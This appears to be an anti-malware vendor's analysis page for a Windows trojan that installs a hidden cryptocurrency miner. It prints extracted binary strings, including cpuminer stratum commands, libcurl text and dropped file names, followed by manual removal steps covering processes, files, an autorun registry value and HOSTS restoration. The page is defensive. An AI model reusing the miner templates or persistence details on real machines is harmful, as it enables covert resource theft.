{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
#"! '&%$ *)(/.-,32107654;:98?>=<2
tXXFr.rh.44Aw-wl-66
r.rh.44Fw-wl-66A
.rh.44Fr-wl-66Aw
O9K\9..eKW
trh.44Fr.wl-66Aw-
K\9..eK9
h.44Fr.rl-66Aw-w
O\9..eK9K=W
.44Fr.rh-66Aw-wl
9..eK9K\W
t44Fr.rh.66Aw-wl-
..eK9K\9
tX4Fr.rh.46Aw-wl-6
.eK9K\9.
7.35.0
smtp
tftp
getpeername() failed with errno %d: %s
getsockname() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Immediate connect fail for %s: %s
Couldn't bind to '%s'
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
[%s %s %s]
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
%s:%d
Hostname was %sfound in DNS cache
timeout on name lookup is not supported
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
IDN support not present, can't parse Unicode domains
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
[^:]:%[^
:]://%[^
 malformed
SMTP.
Rebuilt URL to: %s
Protocol %s not supported or disabled in libcurl
%s://%s
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found bundle for host %s: %p
Server doesn't support pipelining
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with host %s
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Curl_poll(%d ds, %d ms)
Internal error clearing splay node = %d
Internal error removing splay node = %d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %I64d
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%d.%d.%d.%d
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Please call curl_multi_perform() soon
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: unknown PASS reply
FTP: Accepting server connect has timed out
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Problem with the SSL CA cert (path? access rights?)
Error in the SSH layer
Issuer check against peer certificate failed
FTP: The server did not accept the PRET command.
Unable to parse FTP file list
0123456789
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Curl_ipv4_resolve_r failed for %s
%sAuthorization: Basic %s
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
USER %s
PBSZ %d
Failure sending QUIT command: %s
ftp server doesn't support SIZE
RETR %s
Connect data stream passively
APPE %s
STOR %s
SIZE %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
socket failure: %s
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
%s %s
Failure sending PORT command: %s
Uploading to a URL without a file name!
FTPS not supported!
PASS %s
ACCT %s
Access denied: d
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Connecting to %s (%s) port %d
TYPE %c
MDTM %s
CWD %s
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
FTP response timeout
FTP response aborted due to select/poll error: %d
Preparing for accepting server on data port
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
AUTH %s
ACCT rejected by server: d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
PRET command not accepted: d
Failed to do PORT
RETR response: d
Failed FTP upload: 

Wildcard - START of "%s"
Wildcard - "%s" skipped by user
ftp_perform ends with SECONDARY: %d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
PORT
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
WS2_32.DLL
CLIENT libcurl 7.35.0
MATCH %s %s %s
DEFINE %s %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LDAP local: trying to establish %s connection
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
set timeouts for state %d; Total %ld, retry %d maxtry %d
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
bind() failed; %s
%s%c%s%c
tftp_send_first: internal error
TFTP finished
TFTP response timeout
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
TFTP
%cd
LIST "%s" *
FETCH %s BODY[%s]
LOGIN
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
IMAPS not supported!
Access denied: %d
APPEND %s (\Seen) {%I64d}
SELECT %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
Authentication failed: %d
AUTH %s %s
POP3S not supported!
APOP %s %s
STLS not supported.
RCPT TO:%s
RCPT TO:<%s>
SMTPS not supported!
Got unexpected smtp-server response: %d
EHLO %s
HELO %s
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
SMTP
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%%X
xxxx
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
login
password
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is not blacklisted
Server %s is blacklisted
d:d:d
d:d
%c%c==
%c%c%c=
------------------------xx
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
.jpeg
.html
0123456789-
%s xxxxxxxxxxxxxxxx
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
user=%s
auth=Bearer %s
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X B=%d b=%p w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)
PeekNamedPipe
_acmdln
_amsg_exit
ldap_msgfree
ADVAPI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
wldap32.dll
WS2_32.dll
"@"@"@"@
File: %ws, Line %u

aiz8uainiwyo.exe_1676:

.text
`.rdata
@.data
QSSSSSSh
9-T}L
s)%u1
j.hd2L
L$pj.hd2L
L$,SSShP
SShppC
SSSh`
SSShP5A
~aSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ihjbkwa.exe
yo.exe
Smart Web Counter Removal Brightness User-mode
[email protected]
uucarfjeig.exe
".qOt
&.tL}Yj
Eg@%c
.WUUx
}d%S;
6{.qO
#).oA
=.Naw
uL.xb
`=F.QU
zcÁ
%Documents and Settings%\LocalService
%WinDir%\TEMP\aiz8uainiwyo.exe
mscoree.dll
KERNEL32.DLL

uucarfjeig.exe_260:

.text
`.rdata
@.data
QSSSSSSh
9-T}L
s)%u1
j.hd2L
L$pj.hd2L
L$,SSShP
SShppC
SSSh`
SSShP5A
~aSSSh
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
AWS2_32.dll
OLEAUT32.dll
cmd.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
GDI32.dll
KERNEL32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
ihjbkwa.exe
yo.exe
Smart Web Counter Removal Brightness User-mode
[email protected]
uucarfjeig.exe
".qOt
&.tL}Yj
Eg@%c
.WUUx
}d%S;
6{.qO
#).oA
=.Naw
uL.xb
`=F.QU
zcÁ
%Documents and Settings%\LocalService
%System%\uucarfjeig.exe
mscoree.dll
KERNEL32.DLL


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    aiz8uai9f3yo.exe:2316
    aiz8uai9f3yo.exe:3856
    aiz8uahpqryo.exe:3144
    aiz8uahl8fyobacsnr.exe:3212
    aiz8uainiwyo.exe:1676
    aiz8uaj04hyo.exe:2648
    ihjbkwa.exe:416
    ihjbkwa.exe:3740
    %original file name%.exe:2676
    uucarfjeig.exe:2064
    uucarfjeig.exe:260
    uucarfjeig.exe:1528

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\ansdmhhppztc\etc (10 bytes)
    %System%\drivers\etc\hosts (22 bytes)
    %System%\ihjbkwa.exe (5873 bytes)
    %System%\ansdmhhppztc\tst (10 bytes)
    %WinDir%\Temp\aiz8uaj04hyo.exe (35 bytes)
    %WinDir%\Temp\aiz8uainiwyo.exe (5873 bytes)
    %System%\ansdmhhppztc\ihst (164 bytes)
    %WinDir%\Temp\aiz8uaiiyfyo.exe (1940 bytes)
    %System%\uucarfjeig.exe (5873 bytes)
    %System%\win64drkaesent.exe (67687 bytes)
    %System%\win32drkclient.exe (25340 bytes)
    %System%\win64drkclient.exe (68472 bytes)
    %WinDir%\Temp\aiz8uahpqryo.exe (35 bytes)
    %System%\ansdmhhppztc\run (10 bytes)
    %System%\ansdmhhppztc\rng (108 bytes)
    %WinDir%\Temp\aiz8uai9f3yo.exe (35 bytes)
    %System%\ansdmhhppztc\cfg (782 bytes)
    %System%\ansdmhhppztc\por (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aiz8uahl8fyobacsnr.exe (3883 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Profile Peer Logs Encryption" = "%System%\ihjbkwa.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now